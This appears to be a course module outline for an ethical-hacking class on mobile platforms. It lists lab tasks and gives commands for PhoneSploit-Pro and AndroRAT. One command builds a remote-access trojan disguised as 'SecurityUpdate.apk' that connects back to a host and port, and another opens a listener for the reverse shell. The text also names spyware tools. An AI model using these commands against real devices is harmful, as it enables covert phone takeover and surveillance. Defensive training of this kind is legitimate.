Module 17: Hacking Mobile Platforms

Ethical hackers or penetration testers use numerous tools and techniques to attack target mobile devices. The recommended labs that will assist you in learning various mobile attack techniques include:

  1. Hack android devices

    • Exploit the Android platform through ADB using PhoneSploit-Pro

    • Hack an Android Device by Creating APK File using AndroRAT

  2. Secure Android Devices using Various Android Security Tools

    • Secure Android devices from malicious apps using AVG

Lab 1: Hack Android Devices

Task 1: Exploit the Android Platform through ADB using PhoneSploit-Pro

## Tools used in this section : 
PhoneSploit-Pro
    cd  phonesploit-pro
    python3 phonesploi-pro.py

Task 2: Hack an Android Device by Creating APK File using AndroRAT

## Tools used in this section : 
AndroidRAT
    python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk
    python3 androRAT.py --shell -i 0.0.0.0 -p 4444

Other tools used in this section :

1. hxp_photo_eye (https://github.com)
2. Gallery Eye (https://github.com)
3. mSpy (https://www.mspy.com)
4. Hackingtoolkit (https://github.com) to hack Android devices.

You can use other mobile antivirus and anti-spyware tools such as

1. Certo: Anti Spyware & Security (https://play.google.com)
2. Anti Spy Detector - Spyware (https://play.google.com)
3. iAmNotified - Anti Spy System (https://iamnotified.com)
4. Anti Spy (https://www.protectstar.com)
5. Secury - Anti Spy Security (https://apps.apple.com) to secure mobile devices

Last updated